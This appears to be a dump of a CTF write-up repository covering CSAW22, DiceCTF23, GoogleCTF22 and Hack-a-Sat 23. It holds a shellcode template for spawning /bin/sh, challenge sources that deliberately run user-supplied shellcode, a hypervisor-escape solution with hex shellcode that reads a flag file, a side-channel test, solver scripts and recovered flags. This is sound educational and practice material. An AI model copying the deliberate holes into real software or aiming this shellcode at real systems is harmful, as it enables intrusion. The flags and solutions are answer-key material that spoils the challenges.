Your task is to read the hints in the script and complete the script. 17 | 18 | # Debug 19 | You can debug on your container, or you can use mine: 20 | 21 | `docker pull n132/pwn:22.04` (I installed the tools with [this script][1]) 22 | 23 | After pull-ing the image, you can run the container with this cmd: 24 | `docker run --privileged -it n132/pwn:22.04 zsh` 25 | 26 | Then, you shall copy the vulnerable file to the container from the host, whose ID can be found by `docker ps -a`. 27 | 28 | Run these commands on your host to perform copy: 29 | 30 | ```sh 31 | docker cp ./bin/exp.py {Container ID}:/ 32 | docker cp ./bin/chal1 {Container ID}:/ 33 | ``` 34 | 35 | Now we can debug the binary on your container by running `python3 exp.py`. Please don't forget to run `tmux` before debugging. 36 | 37 | You can also find more cmds on this page: `https://docs.docker.com/engine/reference/commandline/docker/`. 38 | 39 | # Debug with GDB 40 | 41 | This [article][2] would help you to debug with GDB. 42 | 43 | 44 | 45 | [1]: https://github.com/n132/CTF-Challenges/blob/main/Enviroment/Docker/Ubuntu22.04.sh 46 | [2]: https://n132.github.io/2018/03/06/Debug_With_GDB.html 47 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal1 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal2 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal3 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal4 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/chal -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context.log_level='debug' 3 | p = process("./chal1") 4 | # p = remote("127.0.0.1", 60001) 5 | context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P'] 6 | gdb.attach(p) # attach to debug, don't forget to run "tmux" before running the script 7 | # Tip: In x64, 8 | # rdi/rsi/rdx is the register to store the first/second/third parameter of a syscall 9 | # rax is the syscall number, for example `mov rax,0 ; syscall` means calling read 10 | # Also, the return value would be stored at rax 11 | 12 | # There is a template of syscall(v1,v2,0,0) 13 | # You can check all Linux x64 syscalls at this page: https://syscalls64.paolostivanin.com/ 14 | # Your task is understanding and completing the shellcode 15 | 16 | # And our goal is running exec("/bin/sh",0,0) to get a shell 17 | # Make sure to hexify the arguments for shellcode! 18 | 19 | v1 = ? 20 | v2 = ? 21 | 22 | context.arch = 'amd64' 23 | 24 | shellcode = f''' 25 | xor rax, rax 26 | xor rdi, rdi 27 | xor rsi, rsi 28 | xor rdx, rdx 29 | mov rax, {v1} 30 | mov rdi, {v2} 31 | push rdi 32 | mov rdi, rsp 33 | syscall 34 | ''' 35 | 36 | p.sendlineafter(": \n",asm(shellcode).ljust(0x100,b'\0')) 37 | 38 | p.interactive() 39 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/flag: -------------------------------------------------------------------------------- 1 | flag{this_is_a_fake_flag} -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/logo: -------------------------------------------------------------------------------- 1 | oooo .oooo. 2 | `888 .dP""Y88b 3 | 888 .oo. .ooooo. oooo oooo ooo ]8P' oo.ooooo. oooo oooo ooo ooo. .oo. 4 | 888P"Y88b d88' `88b `88. `88. .8' .d8P' 888' `88b `88. `88. .8' `888P"Y88b 5 | 888 888 888 888 `88..]88..8' .dP' 888 888 `88..]88..8' 888 888 6 | 888 888 888 888 `888'`888' .oP .o 888 888 `888'`888' 888 888 7 | o888o o888o `Y8bod8P' `8' `8' 8888888888 888bod8P' `8' `8' o888o o888o 8 | 888 9 | o888o 10 | 11 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/start.sh: -------------------------------------------------------------------------------- 1 | cd ./run; cat ./logo ; timeout 120 ./chal 2 | 3 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/ctf.xinetd: -------------------------------------------------------------------------------- 1 | service ctf 2 | { 3 | disable = no 4 | socket_type = stream 5 | protocol = tcp 6 | wait = no 7 | user = root 8 | type = UNLISTED 9 | port = 9999 10 | bind = 0.0.0.0 11 | server = /usr/sbin/chroot 12 | # replace helloworld to your program 13 | server_args = --userspec=1000:1000 /home/ctf ./run/start.sh 14 | banner_fail = /etc/banner_fail 15 | # safety options 16 | per_source = 10 # the maximum instances of this service per source IP address 17 | rlimit_cpu = 20 # the maximum number of CPU seconds that the service may use 18 | #rlimit_as = 1024M # the Address Space resource limit for the service 19 | #access_times = 2:00-9:00 12:00-24:00 20 | } 21 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | 3 | services: 4 | ctf: 5 | build: ./ 6 | image: ctf 7 | volumes: 8 | - "./bin:/home/ctf/run:ro" 9 | - "./ctf.xinetd:/etc/xinetd.d/ctf:ro" 10 | - "./tmp:/tmp:ro" 11 | ports: 12 | - "60001:9999" 13 | expose: 14 | - "9999" 15 | pids_limit: 1024 16 | cpus: 0.5 17 | restart: unless-stopped 18 | privileged: true 19 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/src/chal1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | void init(){ 4 | // Set stdin/stdout unbuffered 5 | // So folks would not have io(input/output) issues 6 | fclose(stderr); 7 | setvbuf(stdin, 0, 2, 0); 8 | setvbuf(stdout, 0, 2, 0); 9 | } 10 | int main(){ 11 | init(); 12 | // A buffer is created to store your shellcode 13 | char buf[0x100]; 14 | puts("Enter your shellcode: "); 15 | read(0, buf, 0x100); 16 | // A functioner point is defined and points to the buffer. 17 | void (* p )(); 18 | p = (void (*)()) buf; 19 | // Let's run the shellcode 20 | p(); 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/src/chal2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | void panic(char *s){ 8 | puts(s); 9 | _exit(1); 10 | } 11 | void checkin(){ 12 | // Solved the previous challenge, and find the ticket in "/flag" 13 | char real_ticket[0x30] = {0}; 14 | char your_ticket[0x30] = {0}; 15 | int f = open("./ticket",0); 16 | if(f<0) 17 | panic("[-] Fail to open tickect"); 18 | read(f,real_ticket,0x20); 19 | read(0,your_ticket,0x20); 20 | close(f); 21 | if(strncmp(real_ticket,your_ticket,0x20)) 22 | panic("[-] Wrong Ticket"); 23 | return ; 24 | } 25 | void init(){ 26 | fclose(stderr); 27 | setvbuf(stdin, 0, 2, 0); 28 | setvbuf(stdout, 0, 2, 0); 29 | checkin(); 30 | } 31 | int main(){ 32 | init(); 33 | char buf[0x100]; 34 | puts("Enter your shellcode: "); 35 | read(0, buf, 0x10); 36 | // Sorry I am too lazy to type an additional "0" 37 | void (* p )(); 38 | p = (void (*)())buf; 39 | p(); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Add your startup script 3 | 4 | # DO NOT DELETE 5 | /etc/init.d/xinetd start; 6 | sleep infinity; 7 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after2.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before2.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-ss-call-rdx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-ss-call-rdx.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/chatgpt-output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/chatgpt-output.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/chatgpt-prompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/chatgpt-prompt.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/flag.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/playground-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/playground-flag.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/prompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/prompt.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/sample-input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/sample-input.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/src/mlog.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/src/mlog.tar.gz -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # directory initramfs/ contains the extracted initramfs.cpio.gz 3 | 4 | set -e 5 | gcc -static main.c -o main 6 | mv main initramfs 7 | 8 | cd initramfs 9 | find . -print0 | cpio --null --create --verbose --format=newc | gzip --best > ../initramfs_patched.cpio.gz 10 | cd - 11 | 12 | cp initramfs_patched.cpio.gz /mnt/vm-tmp-shared/tmp-upload/initramfs_patched.cpio.gz 13 | # http://80.113.228.215:53023/initramfs_patched.cpio.gz 14 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/gen-shellcode.py: -------------------------------------------------------------------------------- 1 | 2 | from pwn import * 3 | 4 | # Set up pwntools for the correct architecture. See `context.binary/arch/bits/endianness` for more 5 | context.binary = elfexe = ELF('./dicer-visor') 6 | 7 | def dumpShellcode(shellcode): 8 | shellcode_str = '' 9 | for b in shellcode: 10 | shellcode_str += "\\x{:02x}".format(b) 11 | msg = f'const char *shellcode = "{shellcode_str}";\n' 12 | msg += f'const size_t shellcode_len = {len(shellcode)};' 13 | print(msg) 14 | 15 | shellcode = b'' 16 | shellcode += asm( 17 | ''' 18 | xor rdx, rdx /* O_RDONLY */ 19 | ''' + 20 | pwnlib.shellcraft.linux.cat("flag.txt") 21 | ) 22 | dumpShellcode(shellcode) 23 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | #mount -t proc none /proc 4 | #mount -t sysfs none /sys 5 | #mount -t debugfs none /sys/kernel/debug 6 | 7 | echo 1 > /sys/module/rcutree/parameters/rcu_cpu_stall_suppress 8 | 9 | echo "Hello kernel world!" 10 | 11 | /sbin/insmod /vuln.ko 12 | mknod /dev/exploited-device c 32 0 13 | chmod ugo+x /main 14 | 15 | exec /main 16 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/initramfs_patched.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/solution/initramfs_patched.cpio.gz -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/main.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | const char *shellcode = "\x48\x31\xd2\x6a\x01\xfe\x0c\x24\x48\xb8\x66\x6c\x61\x67\x2e\x74\x78\x74\x50\x6a\x02\x58\x48\x89\xe7\x31\xf6\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05"; 11 | const size_t shellcode_len = 47; 12 | 13 | int main(int argc, char ** argv) { 14 | printf("Hello World!\n"); 15 | 16 | int fd = open("/dev/exploited-device", O_RDWR); 17 | if(fd == -1) { 18 | perror("open"); 19 | exit(1); 20 | } 21 | 22 | ssize_t res = write(fd, shellcode, shellcode_len); 23 | if(res != shellcode_len) { 24 | printf("write error. Written: %ld\n", res); 25 | exit(1); 26 | } 27 | res = ioctl(fd, 0xdead); //write shellcode to supervisor 28 | if (res<0) { 29 | perror("ioctl1"); 30 | exit(1); 31 | } 32 | res = ioctl(fd, 0xbeef); //invoke shellcode 33 | if (res<0) { 34 | perror("ioctl2"); 35 | exit(1); 36 | } 37 | 38 | return 0; 39 | } 40 | 41 | //dice{dicer-visor-rules} 42 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/src/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/src/bzImage -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/src/dicer-visor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/src/dicer-visor -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/src/initramfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/src/initramfs.cpio.gz -------------------------------------------------------------------------------- /diceCTF23/rev/not-baby-parallelism/solution.py: -------------------------------------------------------------------------------- 1 | 2 | import string 3 | import os 4 | import sys 5 | 6 | FLAG_LEN = 51 7 | IF_NAME = 'generated_input.txt' 8 | OF_NAME = "output.txt" 9 | prefix = 'dice{' 10 | 11 | def readOutput(OF_NAME): 12 | res = [] 13 | with open(OF_NAME) as f: 14 | for _ in range(FLAG_LEN): 15 | num = int(f.readline().strip()) 16 | res.append(num) 17 | assert(len(res) == FLAG_LEN) 18 | return res 19 | expected_flag = readOutput("src/flag.out") 20 | # print(expected_flag) 21 | 22 | while len(prefix) < FLAG_LEN: 23 | print(f"Current prefix: {prefix}") 24 | alphabet = string.printable 25 | guess_found = False 26 | for g in alphabet: 27 | flag = prefix + g + 'A'*(FLAG_LEN-len(prefix)-1-1) + '}' 28 | assert(len(flag) == FLAG_LEN) 29 | with open(IF_NAME, 'w') as f: 30 | f.write(f'{FLAG_LEN}\n') 31 | for c in flag: 32 | f.write(f'{ord(c)}\n') 33 | os.system(f'./src/pppp -n 1 -i {IF_NAME} -o {OF_NAME} > /dev/null') 34 | output = readOutput(OF_NAME) 35 | guess_idx = len(prefix) 36 | if expected_flag[:guess_idx+1] == output[:guess_idx+1]: 37 | print(f"It is a match! char: {g}") 38 | guess_found = True 39 | prefix += g 40 | break 41 | 42 | if not guess_found: 43 | print("No guess found!") 44 | sys.exit(1) 45 | 46 | if len(prefix) == FLAG_LEN-1: 47 | prefix += '}' 48 | break 49 | 50 | print(f"\nFlag: {prefix}") 51 | # dice{p4r411el_pref1x_sc4ns_w0rk_efficient_but_sl0w} 52 | -------------------------------------------------------------------------------- /diceCTF23/rev/not-baby-parallelism/src/flag.out: -------------------------------------------------------------------------------- 1 | 100 2 | 13 3 | 110 4 | 19 5 | 104 6 | 30 7 | 42 8 | 1539 9 | 1591 10 | 1544 11 | 1593 12 | 136971 13 | 137063 14 | 137022 15 | 137038 16 | 5230 17 | 5131 18 | 5233 19 | 5184 20 | 397480 21 | 397559 22 | 397524 23 | 397495 24 | 12938 25 | 13028 26 | 12967 27 | 13048 28 | 892722 29 | 892674 30 | 892788 31 | 892703 32 | 19864 33 | 19965 34 | 19867 35 | 19965 36 | 357552 37 | 357587 38 | 357562 39 | 357599 40 | 19682 41 | 19606 42 | 19725 43 | 19823 44 | 1299012 45 | 1298992 46 | 1299055 47 | 1298972 48 | 24582 49 | 24630 50 | 24653 51 | 24624 52 | -------------------------------------------------------------------------------- /diceCTF23/rev/not-baby-parallelism/src/pppp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/not-baby-parallelism/src/pppp -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/gdb.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/memcmp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/memcmp.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/ready-to-attach.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/ready-to-attach.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/run.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/src/parallelism: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/src/parallelism -------------------------------------------------------------------------------- /diceCTF23/rev/time-travel/solution.py: -------------------------------------------------------------------------------- 1 | 2 | import struct 3 | import numpy as np 4 | from ctypes import * 5 | 6 | 7 | with open("input.bin", 'rb') as f: 8 | data = f.read() 9 | assert(len(data) == 0x28a04) 10 | 11 | flag = '' 12 | N = struct.unpack(" 4 | #include //MAP_UNINITIALIZED 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | #include 12 | 13 | void test1() { 14 | void *res = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 15 | assert(res); 16 | 17 | printf("mmaped at %p\n", res); 18 | memset(res, 0x41, 0x1000); 19 | 20 | void *overlap = mmap(res, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_UNINITIALIZED, -1, 0); 21 | printf("overlap: %p\n", overlap); 22 | 23 | /* 24 | * Hypothesis: Remapping at the same area might keep the previous contents 25 | * Result: This did not happen 26 | */ 27 | } 28 | 29 | void test2() { 30 | struct stat mybuf; 31 | 32 | void *res = mmap(NULL, 0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 33 | assert(res); 34 | 35 | //CWD contains "test" file (aka this binary) 36 | int syscall_res; 37 | syscall_res = stat("test", &mybuf); 38 | printf("Valid syscall result: %d\n", syscall_res); 39 | 40 | syscall_res = stat("test", res); 41 | printf("Invalid syscall result: %d\n", syscall_res); 42 | 43 | /* 44 | * Hypothesis stat(const char *pathname, struct stat *statbuf); with a valid pathname and a PROT_NONE statbuf might be our side-channel 45 | * Result: This WORKS! 46 | * Valid syscall result: 0 47 | * Invalid syscall result: -1 48 | */ 49 | } 50 | 51 | int main() { 52 | test2(); 53 | return 0; 54 | } 55 | -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/resources/2551253642bde3066e55c9cc8e9b0b4aa77feadc00c81032da778e6f7c89907135dfc2611fd8617204720dbfadb31429ae11f6ecd202887f4ce99f2f53a3c5e8.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/resources/2551253642bde3066e55c9cc8e9b0b4aa77feadc00c81032da778e6f7c89907135dfc2611fd8617204720dbfadb31429ae11f6ecd202887f4ce99f2f53a3c5e8.zip -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/resources/detailed-offsets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/resources/detailed-offsets.png -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/resources/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/resources/overview.png -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/src/dump.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/src/dump.zip -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/resources/17f98f8c9c9f8089ab3a35e94de752582253c3784637fe6ef6a561c12b817fcd7acf05a4573bff2cd43247f8e5263200aa29745605ae2719de774160bb21e301.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/sandbox/treebox/resources/17f98f8c9c9f8089ab3a35e94de752582253c3784637fe6ef6a561c12b817fcd7acf05a4573bff2cd43247f8e5263200aa29745605ae2719de774160bb21e301.zip -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/.python-version: -------------------------------------------------------------------------------- 1 | 3.10.4 2 | -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | RUN apt-get update && apt-get install python3 python3-pip -yy 3 | RUN pip install ipython 4 | 5 | COPY treebox.py /home/treebox.py 6 | COPY flag /home/flag 7 | 8 | WORKDIR /home 9 | CMD "/bin/bash" 10 | -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/flag: -------------------------------------------------------------------------------- 1 | CTF{CzeresniaTopolaForsycja} -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/treebox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 -u 2 | # 3 | # Flag is in a file called "flag" in cwd. 4 | # 5 | # Quote from Dockerfile: 6 | # FROM ubuntu:22.04 7 | # RUN apt-get update && apt-get install -y python3 8 | # 9 | import ast 10 | import sys 11 | import os 12 | 13 | def verify_secure(m): 14 | for x in ast.walk(m): 15 | match type(x): 16 | case (ast.Import|ast.ImportFrom|ast.Call): 17 | print(f"ERROR: Banned statement {x}") 18 | return False 19 | return True 20 | 21 | abspath = os.path.abspath(__file__) 22 | dname = os.path.dirname(abspath) 23 | os.chdir(dname) 24 | 25 | print("-- Please enter code (last line must contain only --END)") 26 | source_code = "" 27 | while True: 28 | line = sys.stdin.readline() 29 | if line.startswith("--END"): 30 | break 31 | source_code += line 32 | 33 | tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST) 34 | if verify_secure(tree): # Safe to execute! 35 | print("-- Executing safe code:") 36 | compiled = compile(source_code, "input.py", 'exec') 37 | exec(compiled) -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/gdb-multiarch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/gdb-multiarch.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/pwntools-gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/pwntools-gdb.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-datatypes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-datatypes.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-registers.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/minimal-template.py: -------------------------------------------------------------------------------- 1 | # minimal-template.py 2 | # A minimal custom template for binary exploitation that uses pwntools. 3 | # Run: 4 | # python minimal-template.py [DEBUG] [GDB] 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture. See `context.binary/arch/bits/endianness` for more 8 | context.binary = elfexe = ELF('./smash-baby') 9 | print(context) 10 | 11 | def start(argv=[], *a, **kw): 12 | '''Start the exploit against the target.''' 13 | if args.GDB: 14 | return gdb.debug([elfexe.path] + argv, gdbscript, elfexe.path, *a, *kw) 15 | else: 16 | target = process([elfexe.path] + argv, *a, **kw) 17 | return target 18 | 19 | # Specify your gdb script here for debugging. gdb will be launched the GDB argument is given. 20 | gdbscript = ''' 21 | # init-gef 22 | # continue 23 | '''.format(**locals()) 24 | 25 | arguments = [] 26 | io = start(arguments) 27 | io.interactive() 28 | io.close() 29 | -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/qemu-riscv: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32 -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/qemu-riscv-static: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32-static -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/smash-baby: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/smash-baby -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/drop-baby: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/dROP-Baby/src/drop-baby -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/hidden/server.ini: -------------------------------------------------------------------------------- 1 | Application Name:Baby dROP 2 | A1_MSG_LEN:40 3 | A2_MSG_LEN:10 4 | B1_MSG_LEN:20 5 | B2_MSG_LEN:300 6 | CC_MSG_LEN:25 7 | ZY_MSG_LEN:0 8 | SILENT_ERRORS:TRUE -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/qemu-riscv: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32 -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/qemu-riscv-static: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32-static 